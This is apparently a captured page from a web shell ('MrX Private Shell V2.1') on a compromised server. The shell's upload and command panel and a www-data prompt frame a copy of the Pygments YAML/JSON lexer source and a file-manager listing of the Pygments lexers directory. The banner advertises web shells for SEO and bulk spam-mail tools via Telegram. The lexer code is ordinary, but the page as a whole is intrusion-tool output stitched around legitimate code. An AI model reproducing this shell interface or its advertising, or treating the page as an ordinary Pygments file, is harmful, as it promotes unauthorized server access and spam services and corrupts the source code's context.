__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
"""
    pygments.lexers.data
    ~~~~~~~~~~~~~~~~~~~~

    Lexers for data file format.

    :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
"""

from pygments.lexer import Lexer, ExtendedRegexLexer, LexerContext, \
    include, bygroups
from pygments.token import Comment, Error, Keyword, Literal, Name, Number, \
    Punctuation, String, Whitespace

__all__ = ['YamlLexer', 'JsonLexer', 'JsonBareObjectLexer', 'JsonLdLexer']


class YamlLexerContext(LexerContext):
    """Indentation context for the YAML lexer."""

    def __init__(self, *args, **kwds):
        super().__init__(*args, **kwds)
        self.indent_stack = []
        self.indent = -1
        self.next_indent = 0
        self.block_scalar_indent = None


class YamlLexer(ExtendedRegexLexer):
    """
    Lexer for YAML, a human-friendly data serialization
    language.

    .. versionadded:: 0.11
    """

    name = 'YAML'
    url = 'http://yaml.org/'
    aliases = ['yaml']
    filenames = ['*.yaml', '*.yml']
    mimetypes = ['text/x-yaml']

    def something(token_class):
        """Do not produce empty tokens."""
        def callback(lexer, match, context):
            text = match.group()
            if not text:
                return
            yield match.start(), token_class, text
            context.pos = match.end()
        return callback

    def reset_indent(token_class):
        """Reset the indentation levels."""
        def callback(lexer, match, context):
            text = match.group()
            context.indent_stack = []
            context.indent = -1
            context.next_indent = 0
            context.block_scalar_indent = None
            yield match.start(), token_class, text
            context.pos = match.end()
        return callback

    def save_indent(token_class, start=False):
        """Save a possible indentation level."""
        def callback(lexer, match, context):
            text = match.group()
            extra = ''
            if start:
                context.next_indent = len(text)
                if context.next_indent < context.indent:
                    while context.next_indent < context.indent:
                        context.indent = context.indent_stack.pop()
                    if context.next_indent > context.indent:
                        extra = text[context.indent:]
                        text = text[:context.indent]
            else:
                context.next_indent += len(text)
            if text:
                yield match.start(), token_class, text
            if extra:
                yield match.start()+len(text), token_class.Error, extra
            context.pos = match.end()
        return callback

    def set_indent(token_class, implicit=False):
        """Set the previously saved indentation level."""
        def callback(lexer, match, context):
            text = match.group()
            if context.indent < context.next_indent:
                context.indent_stack.append(context.indent)
                context.indent = context.next_indent
            if not implicit:
                context.next_indent += len(text)
            yield match.start(), token_class, text
            context.pos = match.end()
        return callback

    def set_block_scalar_indent(token_class):
        """Set an explicit indentation level for a block scalar."""
        def callback(lexer, match, context):
            text = match.group()
            context.block_scalar_indent = None
            if not text:
                return
            increment = match.group(1)
            if increment:
                current_indent = max(context.indent, 0)
                increment = int(increment)
                context.block_scalar_indent = current_indent + increment
            if text:
                yield match.start(), token_class, text
                context.pos = match.end()
        return callback

    def parse_block_scalar_empty_line(indent_token_class, content_token_class):
        """Process an empty line in a block scalar."""
        def callback(lexer, match, context):
            text = match.group()
            if (context.block_scalar_indent is None or
                    len(text) <= context.block_scalar_indent):
                if text:
                    yield match.start(), indent_token_class, text
            else:
                indentation = text[:context.block_scalar_indent]
                content = text[context.block_scalar_indent:]
                yield match.start(), indent_token_class, indentation
                yield (match.start()+context.block_scalar_indent,
                       content_token_class, content)
            context.pos = match.end()
        return callback

    def parse_block_scalar_indent(token_class):
        """Process indentation spaces in a block scalar."""
        def callback(lexer, match, context):
            text = match.group()
            if context.block_scalar_indent is None:
                if len(text) <= max(context.indent, 0):
                    context.stack.pop()
                    context.stack.pop()
                    return
                context.block_scalar_indent = len(text)
            else:
                if len(text) < context.block_scalar_indent:
                    context.stack.pop()
                    context.stack.pop()
                    return
            if text:
                yield match.start(), token_class, text
                context.pos = match.end()
        return callback

    def parse_plain_scalar_indent(token_class):
        """Process indentation spaces in a plain scalar."""
        def callback(lexer, match, context):
            text = match.group()
            if len(text) <= context.indent:
                context.stack.pop()
                context.stack.pop()
                return
            if text:
                yield match.start(), token_class, text
                context.pos = match.end()
        return callback

    tokens = {
        # the root rules
        'root': [
            # ignored whitespaces
            (r'[ ]+(?=#|$)', Whitespace),
            # line breaks
            (r'\n+', Whitespace),
            # a comment
            (r'#[^\n]*', Comment.Single),
            # the '%YAML' directive
            (r'^%YAML(?=[ ]|$)', reset_indent(Name.Tag), 'yaml-directive'),
            # the %TAG directive
            (r'^%TAG(?=[ ]|$)', reset_indent(Name.Tag), 'tag-directive'),
            # document start and document end indicators
            (r'^(?:---|\.\.\.)(?=[ ]|$)', reset_indent(Name.Namespace),
             'block-line'),
            # indentation spaces
            (r'[ ]*(?!\s|$)', save_indent(Whitespace, start=True),
             ('block-line', 'indentation')),
        ],

        # trailing whitespaces after directives or a block scalar indicator
        'ignored-line': [
            # ignored whitespaces
            (r'[ ]+(?=#|$)', Whitespace),
            # a comment
            (r'#[^\n]*', Comment.Single),
            # line break
            (r'\n', Whitespace, '#pop:2'),
        ],

        # the %YAML directive
        'yaml-directive': [
            # the version number
            (r'([ ]+)([0-9]+\.[0-9]+)',
             bygroups(Whitespace, Number), 'ignored-line'),
        ],

        # the %TAG directive
        'tag-directive': [
            # a tag handle and the corresponding prefix
            (r'([ ]+)(!|![\w-]*!)'
             r'([ ]+)(!|!?[\w;/?:@&=+$,.!~*\'()\[\]%-]+)',
             bygroups(Whitespace, Keyword.Type, Whitespace, Keyword.Type),
             'ignored-line'),
        ],

        # block scalar indicators and indentation spaces
        'indentation': [
            # trailing whitespaces are ignored
            (r'[ ]*$', something(Whitespace), '#pop:2'),
            # whitespaces preceding block collection indicators
            (r'[ ]+(?=[?:-](?:[ ]|$))', save_indent(Whitespace)),
            # block collection indicators
            (r'[?:-](?=[ ]|$)', set_indent(Punctuation.Indicator)),
            # the beginning a block line
            (r'[ ]*', save_indent(Whitespace), '#pop'),
        ],

        # an indented line in the block context
        'block-line': [
            # the line end
            (r'[ ]*(?=#|$)', something(Whitespace), '#pop'),
            # whitespaces separating tokens
            (r'[ ]+', Whitespace),
            # key with colon
            (r'''([^#,?\[\]{}"'\n]+)(:)(?=[ ]|$)''',
             bygroups(Name.Tag, set_indent(Punctuation, implicit=True))),
            # tags, anchors and aliases,
            include('descriptors'),
            # block collections and scalars
            include('block-nodes'),
            # flow collections and quoted scalars
            include('flow-nodes'),
            # a plain scalar
            (r'(?=[^\s?:,\[\]{}#&*!|>\'"%@`-]|[?:-]\S)',
             something(Name.Variable),
             'plain-scalar-in-block-context'),
        ],

        # tags, anchors, aliases
        'descriptors': [
            # a full-form tag
            (r'!<[\w#;/?:@&=+$,.!~*\'()\[\]%-]+>', Keyword.Type),
            # a tag in the form '!', '!suffix' or '!handle!suffix'
            (r'!(?:[\w-]+!)?'
             r'[\w#;/?:@&=+$,.!~*\'()\[\]%-]*', Keyword.Type),
            # an anchor
            (r'&[\w-]+', Name.Label),
            # an alias
            (r'\*[\w-]+', Name.Variable),
        ],

        # block collections and scalars
        'block-nodes': [
            # implicit key
            (r':(?=[ ]|$)', set_indent(Punctuation.Indicator, implicit=True)),
            # literal and folded scalars
            (r'[|>]', Punctuation.Indicator,
             ('block-scalar-content', 'block-scalar-header')),
        ],

        # flow collections and quoted scalars
        'flow-nodes': [
            # a flow sequence
            (r'\[', Punctuation.Indicator, 'flow-sequence'),
            # a flow mapping
            (r'\{', Punctuation.Indicator, 'flow-mapping'),
            # a single-quoted scalar
            (r'\'', String, 'single-quoted-scalar'),
            # a double-quoted scalar
            (r'\"', String, 'double-quoted-scalar'),
        ],

        # the content of a flow collection
        'flow-collection': [
            # whitespaces
            (r'[ ]+', Whitespace),
            # line breaks
            (r'\n+', Whitespace),
            # a comment
            (r'#[^\n]*', Comment.Single),
            # simple indicators
            (r'[?:,]', Punctuation.Indicator),
            # tags, anchors and aliases
            include('descriptors'),
            # nested collections and quoted scalars
            include('flow-nodes'),
            # a plain scalar
            (r'(?=[^\s?:,\[\]{}#&*!|>\'"%@`])',
             something(Name.Variable),
             'plain-scalar-in-flow-context'),
        ],

        # a flow sequence indicated by '[' and ']'
        'flow-sequence': [
            # include flow collection rules
            include('flow-collection'),
            # the closing indicator
            (r'\]', Punctuation.Indicator, '#pop'),
        ],

        # a flow mapping indicated by '{' and '}'
        'flow-mapping': [
            # key with colon
            (r'''([^,:?\[\]{}"'\n]+)(:)(?=[ ]|$)''',
             bygroups(Name.Tag, Punctuation)),
            # include flow collection rules
            include('flow-collection'),
            # the closing indicator
            (r'\}', Punctuation.Indicator, '#pop'),
        ],

        # block scalar lines
        'block-scalar-content': [
            # line break
            (r'\n', Whitespace),
            # empty line
            (r'^[ ]+$',
             parse_block_scalar_empty_line(Whitespace, Name.Constant)),
            # indentation spaces (we may leave the state here)
            (r'^[ ]*', parse_block_scalar_indent(Whitespace)),
            # line content
            (r'[\S\t ]+', Name.Constant),
        ],

        # the content of a literal or folded scalar
        'block-scalar-header': [
            # indentation indicator followed by chomping flag
            (r'([1-9])?[+-]?(?=[ ]|$)',
             set_block_scalar_indent(Punctuation.Indicator),
             'ignored-line'),
            # chomping flag followed by indentation indicator
            (r'[+-]?([1-9])?(?=[ ]|$)',
             set_block_scalar_indent(Punctuation.Indicator),
             'ignored-line'),
        ],

        # ignored and regular whitespaces in quoted scalars
        'quoted-scalar-whitespaces': [
            # leading and trailing whitespaces are ignored
            (r'^[ ]+', Whitespace),
            (r'[ ]+$', Whitespace),
            # line breaks are ignored
            (r'\n+', Whitespace),
            # other whitespaces are a part of the value
            (r'[ ]+', Name.Variable),
        ],

        # single-quoted scalars
        'single-quoted-scalar': [
            # include whitespace and line break rules
            include('quoted-scalar-whitespaces'),
            # escaping of the quote character
            (r'\'\'', String.Escape),
            # regular non-whitespace characters
            (r'[^\s\']+', String),
            # the closing quote
            (r'\'', String, '#pop'),
        ],

        # double-quoted scalars
        'double-quoted-scalar': [
            # include whitespace and line break rules
            include('quoted-scalar-whitespaces'),
            # escaping of special characters
            (r'\\[0abt\tn\nvfre "\\N_LP]', String),
            # escape codes
            (r'\\(?:x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|U[0-9A-Fa-f]{8})',
             String.Escape),
            # regular non-whitespace characters
            (r'[^\s"\\]+', String),
            # the closing quote
            (r'"', String, '#pop'),
        ],

        # the beginning of a new line while scanning a plain scalar
        'plain-scalar-in-block-context-new-line': [
            # empty lines
            (r'^[ ]+$', Whitespace),
            # line breaks
            (r'\n+', Whitespace),
            # document start and document end indicators
            (r'^(?=---|\.\.\.)', something(Name.Namespace), '#pop:3'),
            # indentation spaces (we may leave the block line state here)
            (r'^[ ]*', parse_plain_scalar_indent(Whitespace), '#pop'),
        ],

        # a plain scalar in the block context
        'plain-scalar-in-block-context': [
            # the scalar ends with the ':' indicator
            (r'[ ]*(?=:[ ]|:$)', something(Whitespace), '#pop'),
            # the scalar ends with whitespaces followed by a comment
            (r'[ ]+(?=#)', Whitespace, '#pop'),
            # trailing whitespaces are ignored
            (r'[ ]+$', Whitespace),
            # line breaks are ignored
            (r'\n+', Whitespace, 'plain-scalar-in-block-context-new-line'),
            # other whitespaces are a part of the value
            (r'[ ]+', Literal.Scalar.Plain),
            # regular non-whitespace characters
            (r'(?::(?!\s)|[^\s:])+', Literal.Scalar.Plain),
        ],

        # a plain scalar is the flow context
        'plain-scalar-in-flow-context': [
            # the scalar ends with an indicator character
            (r'[ ]*(?=[,:?\[\]{}])', something(Whitespace), '#pop'),
            # the scalar ends with a comment
            (r'[ ]+(?=#)', Whitespace, '#pop'),
            # leading and trailing whitespaces are ignored
            (r'^[ ]+', Whitespace),
            (r'[ ]+$', Whitespace),
            # line breaks are ignored
            (r'\n+', Whitespace),
            # other whitespaces are a part of the value
            (r'[ ]+', Name.Variable),
            # regular non-whitespace characters
            (r'[^\s,:?\[\]{}]+', Name.Variable),
        ],

    }

    def get_tokens_unprocessed(self, text=None, context=None):
        if context is None:
            context = YamlLexerContext(text, 0)
        return super().get_tokens_unprocessed(text, context)


class JsonLexer(Lexer):
    """
    For JSON data structures.

    Javascript-style comments are supported (like ``/* */`` and ``//``),
    though comments are not part of the JSON specification.
    This allows users to highlight JSON as it is used in the wild.

    No validation is performed on the input JSON document.

    .. versionadded:: 1.5
    """

    name = 'JSON'
    url = 'https://www.json.org'
    aliases = ['json', 'json-object']
    filenames = ['*.json', '*.jsonl', '*.ndjson', 'Pipfile.lock']
    mimetypes = ['application/json', 'application/json-object', 'application/x-ndjson', 'application/jsonl', 'application/json-seq']

    # No validation of integers, floats, or constants is done.
    # As long as the characters are members of the following
    # sets, the token will be considered valid. For example,
    #
    #     "--1--" is parsed as an integer
    #     "1...eee" is parsed as a float
    #     "trustful" is parsed as a constant
    #
    integers = set('-0123456789')
    floats = set('.eE+')
    constants = set('truefalsenull')  # true|false|null
    hexadecimals = set('0123456789abcdefABCDEF')
    punctuations = set('{}[],')
    whitespaces = {'\u0020', '\u000a', '\u000d', '\u0009'}

    def get_tokens_unprocessed(self, text):
        """Parse JSON data."""

        in_string = False
        in_escape = False
        in_unicode_escape = 0
        in_whitespace = False
        in_constant = False
        in_number = False
        in_float = False
        in_punctuation = False
        in_comment_single = False
        in_comment_multiline = False
        expecting_second_comment_opener = False  # // or /*
        expecting_second_comment_closer = False  # */

        start = 0

        # The queue is used to store data that may need to be tokenized
        # differently based on what follows. In particular, JSON object
        # keys are tokenized differently than string values, but cannot
        # be distinguished until punctuation is encountered outside the
        # string.
        #
        # A ":" character after the string indicates that the string is
        # an object key; any other character indicates the string is a
        # regular string value.
        #
        # The queue holds tuples that contain the following data:
        #
        #     (start_index, token_type, text)
        #
        # By default the token type of text in double quotes is
        # String.Double. The token type will be replaced if a colon
        # is encountered after the string closes.
        #
        queue = []

        for stop, character in enumerate(text):
            if in_string:
                if in_unicode_escape:
                    if character in self.hexadecimals:
                        in_unicode_escape -= 1
                        if not in_unicode_escape:
                            in_escape = False
                    else:
                        in_unicode_escape = 0
                        in_escape = False

                elif in_escape:
                    if character == 'u':
                        in_unicode_escape = 4
                    else:
                        in_escape = False

                elif character == '\\':
                    in_escape = True

                elif character == '"':
                    queue.append((start, String.Double, text[start:stop + 1]))
                    in_string = False
                    in_escape = False
                    in_unicode_escape = 0

                continue

            elif in_whitespace:
                if character in self.whitespaces:
                    continue

                if queue:
                    queue.append((start, Whitespace, text[start:stop]))
                else:
                    yield start, Whitespace, text[start:stop]
                in_whitespace = False
                # Fall through so the new character can be evaluated.

            elif in_constant:
                if character in self.constants:
                    continue

                yield start, Keyword.Constant, text[start:stop]
                in_constant = False
                # Fall through so the new character can be evaluated.

            elif in_number:
                if character in self.integers:
                    continue
                elif character in self.floats:
                    in_float = True
                    continue

                if in_float:
                    yield start, Number.Float, text[start:stop]
                else:
                    yield start, Number.Integer, text[start:stop]
                in_number = False
                in_float = False
                # Fall through so the new character can be evaluated.

            elif in_punctuation:
                if character in self.punctuations:
                    continue

                yield start, Punctuation, text[start:stop]
                in_punctuation = False
                # Fall through so the new character can be evaluated.

            elif in_comment_single:
                if character != '\n':
                    continue

                if queue:
                    queue.append((start, Comment.Single, text[start:stop]))
                else:
                    yield start, Comment.Single, text[start:stop]

                in_comment_single = False
                # Fall through so the new character can be evaluated.

            elif in_comment_multiline:
                if character == '*':
                    expecting_second_comment_closer = True
                elif expecting_second_comment_closer:
                    expecting_second_comment_closer = False
                    if character == '/':
                        if queue:
                            queue.append((start, Comment.Multiline, text[start:stop + 1]))
                        else:
                            yield start, Comment.Multiline, text[start:stop + 1]

                        in_comment_multiline = False

                continue

            elif expecting_second_comment_opener:
                expecting_second_comment_opener = False
                if character == '/':
                    in_comment_single = True
                    continue
                elif character == '*':
                    in_comment_multiline = True
                    continue

                # Exhaust the queue. Accept the existing token types.
                yield from queue
                queue.clear()

                yield start, Error, text[start:stop]
                # Fall through so the new character can be evaluated.

            start = stop

            if character == '"':
                in_string = True

            elif character in self.whitespaces:
                in_whitespace = True

            elif character in {'f', 'n', 't'}:  # The first letters of true|false|null
                # Exhaust the queue. Accept the existing token types.
                yield from queue
                queue.clear()

                in_constant = True

            elif character in self.integers:
                # Exhaust the queue. Accept the existing token types.
                yield from queue
                queue.clear()

                in_number = True

            elif character == ':':
                # Yield from the queue. Replace string token types.
                for _start, _token, _text in queue:
                    # There can be only three types of tokens before a ':':
                    # Whitespace, Comment, or a quoted string.
                    #
                    # If it's a quoted string we emit Name.Tag.
                    # Otherwise, we yield the original token.
                    #
                    # In all other cases this would be invalid JSON,
                    # but this is not a validating JSON lexer, so it's OK.
                    if _token is String.Double:
                        yield _start, Name.Tag, _text
                    else:
                        yield _start, _token, _text
                queue.clear()

                in_punctuation = True

            elif character in self.punctuations:
                # Exhaust the queue. Accept the existing token types.
                yield from queue
                queue.clear()

                in_punctuation = True

            elif character == '/':
                # This is the beginning of a comment.
                expecting_second_comment_opener = True

            else:
                # Exhaust the queue. Accept the existing token types.
                yield from queue
                queue.clear()

                yield start, Error, character

        # Yield any remaining text.
        yield from queue
        if in_string:
            yield start, Error, text[start:]
        elif in_float:
            yield start, Number.Float, text[start:]
        elif in_number:
            yield start, Number.Integer, text[start:]
        elif in_constant:
            yield start, Keyword.Constant, text[start:]
        elif in_whitespace:
            yield start, Whitespace, text[start:]
        elif in_punctuation:
            yield start, Punctuation, text[start:]
        elif in_comment_single:
            yield start, Comment.Single, text[start:]
        elif in_comment_multiline:
            yield start, Error, text[start:]
        elif expecting_second_comment_opener:
            yield start, Error, text[start:]


class JsonBareObjectLexer(JsonLexer):
    """
    For JSON data structures (with missing object curly braces).

    .. versionadded:: 2.2

    .. deprecated:: 2.8.0

       Behaves the same as `JsonLexer` now.
    """

    name = 'JSONBareObject'
    aliases = []
    filenames = []
    mimetypes = []


class JsonLdLexer(JsonLexer):
    """
    For JSON-LD linked data.

    .. versionadded:: 2.0
    """

    name = 'JSON-LD'
    url = 'https://json-ld.org/'
    aliases = ['jsonld', 'json-ld']
    filenames = ['*.jsonld']
    mimetypes = ['application/ld+json']

    json_ld_keywords = {
        '"@%s"' % keyword
        for keyword in (
            'base',
            'container',
            'context',
            'direction',
            'graph',
            'id',
            'import',
            'included',
            'index',
            'json',
            'language',
            'list',
            'nest',
            'none',
            'prefix',
            'propagate',
            'protected',
            'reverse',
            'set',
            'type',
            'value',
            'version',
            'vocab',
        )
    }

    def get_tokens_unprocessed(self, text):
        for start, token, value in super().get_tokens_unprocessed(text):
            if token is Name.Tag and value in self.json_ld_keywords:
                yield start, Name.Decorator, value
            else:
                yield start, token, value

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 11.83 KB 0644
_ada_builtins.py File 1.51 KB 0644
_asy_builtins.py File 26.65 KB 0644
_cl_builtins.py File 13.67 KB 0644
_cocoa_builtins.py File 102.72 KB 0644
_csound_builtins.py File 17.98 KB 0644
_css_builtins.py File 12.15 KB 0644
_julia_builtins.py File 11.6 KB 0644
_lasso_builtins.py File 131.36 KB 0644
_lilypond_builtins.py File 105.56 KB 0644
_lua_builtins.py File 7.93 KB 0644
_mapping.py File 66.43 KB 0644
_mql_builtins.py File 24.13 KB 0644
_mysql_builtins.py File 25.24 KB 0644
_openedge_builtins.py File 48.24 KB 0644
_php_builtins.py File 105.4 KB 0644
_postgres_builtins.py File 13.04 KB 0644
_qlik_builtins.py File 12.3 KB 0644
_scheme_builtins.py File 31.8 KB 0644
_scilab_builtins.py File 51.18 KB 0644
_sourcemod_builtins.py File 26.15 KB 0644
_stan_builtins.py File 13.13 KB 0644
_stata_builtins.py File 26.59 KB 0644
_tsql_builtins.py File 15.1 KB 0644
_usd_builtins.py File 1.62 KB 0644
_vbscript_builtins.py File 4.13 KB 0644
_vim_builtins.py File 55.73 KB 0644
actionscript.py File 11.4 KB 0644
ada.py File 5.2 KB 0644
agile.py File 876 B 0644
algebra.py File 9.64 KB 0644
ambient.py File 2.54 KB 0644
amdgpu.py File 1.63 KB 0644
ampl.py File 4.08 KB 0644
apdlexer.py File 30.04 KB 0644
apl.py File 3.33 KB 0644
archetype.py File 11.2 KB 0644
arrow.py File 3.48 KB 0644
arturo.py File 11.15 KB 0644
asc.py File 1.62 KB 0644
asm.py File 40.28 KB 0644
asn1.py File 4.16 KB 0644
automation.py File 19.35 KB 0644
bare.py File 2.95 KB 0644
basic.py File 27.27 KB 0644
bdd.py File 1.61 KB 0644
berry.py File 3.14 KB 0644
bibtex.py File 4.61 KB 0644
blueprint.py File 6.04 KB 0644
boa.py File 3.82 KB 0644
bqn.py File 3.26 KB 0644
business.py File 27.45 KB 0644
c_cpp.py File 17.53 KB 0644
c_like.py File 28.52 KB 0644
capnproto.py File 2.12 KB 0644
carbon.py File 3.15 KB 0644
cddl.py File 5.06 KB 0644
chapel.py File 5.04 KB 0644
clean.py File 6.25 KB 0644
comal.py File 3.08 KB 0644
compiled.py File 1.37 KB 0644
configs.py File 48.9 KB 0644
console.py File 4.05 KB 0644
cplint.py File 1.36 KB 0644
crystal.py File 15.39 KB 0644
csound.py File 16.6 KB 0644
css.py File 24.73 KB 0644
d.py File 9.64 KB 0644
dalvik.py File 4.5 KB 0644
data.py File 26.4 KB 0644
dax.py File 7.91 KB 0644
devicetree.py File 3.93 KB 0644
diff.py File 5.15 KB 0644
dns.py File 3.69 KB 0644
dotnet.py File 36.74 KB 0644
dsls.py File 35.92 KB 0644
dylan.py File 10.08 KB 0644
ecl.py File 6.22 KB 0644
eiffel.py File 2.63 KB 0644
elm.py File 3.08 KB 0644
elpi.py File 6.55 KB 0644
email.py File 4.63 KB 0644
erlang.py File 18.72 KB 0644
esoteric.py File 10.15 KB 0644
ezhil.py File 3.2 KB 0644
factor.py File 19.07 KB 0644
fantom.py File 9.96 KB 0644
felix.py File 9.42 KB 0644
fift.py File 1.58 KB 0644
floscript.py File 2.61 KB 0644
forth.py File 7.03 KB 0644
fortran.py File 10.1 KB 0644
foxpro.py File 25.6 KB 0644
freefem.py File 26.28 KB 0644
func.py File 3.54 KB 0644
functional.py File 674 B 0644
futhark.py File 3.64 KB 0644
gcodelexer.py File 826 B 0644
gdscript.py File 7.37 KB 0644
go.py File 3.7 KB 0644
grammar_notation.py File 7.79 KB 0644
graph.py File 4.01 KB 0644
graphics.py File 38.11 KB 0644
graphql.py File 5.47 KB 0644
graphviz.py File 1.89 KB 0644
gsql.py File 3.9 KB 0755
haskell.py File 32.13 KB 0644
haxe.py File 30.25 KB 0644
hdl.py File 21.99 KB 0644
hexdump.py File 3.52 KB 0644
html.py File 19.79 KB 0644
idl.py File 15.09 KB 0644
igor.py File 30.92 KB 0644
inferno.py File 3.06 KB 0644
installers.py File 12.87 KB 0644
int_fiction.py File 55.78 KB 0644
iolang.py File 1.86 KB 0644
j.py File 4.74 KB 0644
javascript.py File 61.39 KB 0644
jmespath.py File 2.01 KB 0644
jslt.py File 3.61 KB 0644
jsonnet.py File 5.5 KB 0644
jsx.py File 2.18 KB 0644
julia.py File 11.37 KB 0644
jvm.py File 71.22 KB 0644
kuin.py File 11.14 KB 0644
kusto.py File 3.4 KB 0644
ldap.py File 6.4 KB 0644
lean.py File 4.2 KB 0644
lilypond.py File 9.52 KB 0644
lisp.py File 141.01 KB 0644
macaulay2.py File 31.42 KB 0644
make.py File 7.51 KB 0644
markup.py File 58.84 KB 0644
math.py File 676 B 0644
matlab.py File 129.74 KB 0644
maxima.py File 2.65 KB 0644
meson.py File 4.24 KB 0644
mime.py File 7.36 KB 0644
minecraft.py File 13.49 KB 0644
mips.py File 4.5 KB 0644
ml.py File 34.49 KB 0644
modeling.py File 13.21 KB 0644
modula2.py File 51.83 KB 0644
monte.py File 6.14 KB 0644
mosel.py File 8.97 KB 0644
ncl.py File 62.46 KB 0644
nimrod.py File 6.27 KB 0644
nit.py File 2.66 KB 0644
nix.py File 4.29 KB 0644
oberon.py File 4.07 KB 0644
objective.py File 22.42 KB 0644
ooc.py File 2.91 KB 0644
openscad.py File 3.61 KB 0644
other.py File 1.7 KB 0644
parasail.py File 2.66 KB 0644
parsers.py File 25.3 KB 0644
pascal.py File 30.16 KB 0644
pawn.py File 7.96 KB 0644
perl.py File 38.25 KB 0644
phix.py File 22.71 KB 0644
php.py File 12.73 KB 0644
pointless.py File 1.93 KB 0644
pony.py File 3.17 KB 0644
praat.py File 12.38 KB 0644
procfile.py File 1.13 KB 0644
prolog.py File 12.21 KB 0644
promql.py File 4.6 KB 0644
prql.py File 8.54 KB 0644
ptx.py File 4.4 KB 0644
python.py File 52.15 KB 0644
q.py File 6.77 KB 0644
qlik.py File 3.58 KB 0644
qvt.py File 5.93 KB 0644
r.py File 6.04 KB 0644
rdf.py File 15.61 KB 0644
rebol.py File 17.82 KB 0644
resource.py File 2.83 KB 0644
ride.py File 4.94 KB 0644
rita.py File 1.1 KB 0644
rnc.py File 1.93 KB 0644
roboconf.py File 1.92 KB 0644
robotframework.py File 18.02 KB 0644
ruby.py File 22.14 KB 0644
rust.py File 8.02 KB 0644
sas.py File 9.18 KB 0644
savi.py File 4.54 KB 0644
scdoc.py File 2.47 KB 0644
scripting.py File 68.37 KB 0644
sgf.py File 1.94 KB 0644
shell.py File 35.61 KB 0644
sieve.py File 2.38 KB 0644
slash.py File 8.28 KB 0644
smalltalk.py File 7.04 KB 0644
smithy.py File 2.6 KB 0644
smv.py File 2.71 KB 0644
snobol.py File 2.67 KB 0644
solidity.py File 3.05 KB 0644
sophia.py File 3.25 KB 0644
special.py File 3.33 KB 0644
spice.py File 2.67 KB 0644
sql.py File 41.12 KB 0644
srcinfo.py File 1.65 KB 0644
stata.py File 6.27 KB 0644
supercollider.py File 3.61 KB 0644
tal.py File 2.83 KB 0644
tcl.py File 5.38 KB 0644
teal.py File 3.44 KB 0644
templates.py File 70.91 KB 0644
teraterm.py File 9.49 KB 0644
testing.py File 10.51 KB 0644
text.py File 1 KB 0644
textedit.py File 7.43 KB 0644
textfmts.py File 14.95 KB 0644
theorem.py File 16.27 KB 0644
thingsdb.py File 4.13 KB 0644
tlb.py File 1.34 KB 0644
tls.py File 1.5 KB 0644
tnt.py File 10.21 KB 0644
trafficscript.py File 1.44 KB 0644
typoscript.py File 8.01 KB 0644
ul4.py File 8.75 KB 0644
unicon.py File 18.08 KB 0644
urbi.py File 5.9 KB 0644
usd.py File 3.43 KB 0644
varnish.py File 7.1 KB 0644
verification.py File 3.79 KB 0644
verifpal.py File 2.6 KB 0644
vip.py File 5.58 KB 0644
vyper.py File 5.46 KB 0644
web.py File 894 B 0644
webassembly.py File 5.57 KB 0644
webidl.py File 10.27 KB 0644
webmisc.py File 39.6 KB 0644
wgsl.py File 11.64 KB 0644
whiley.py File 3.92 KB 0644
wowtoc.py File 3.93 KB 0644
wren.py File 3.16 KB 0644
x10.py File 1.88 KB 0644
xorg.py File 902 B 0644
yang.py File 4.39 KB 0644
yara.py File 2.37 KB 0644
zig.py File 3.86 KB 0644
Filemanager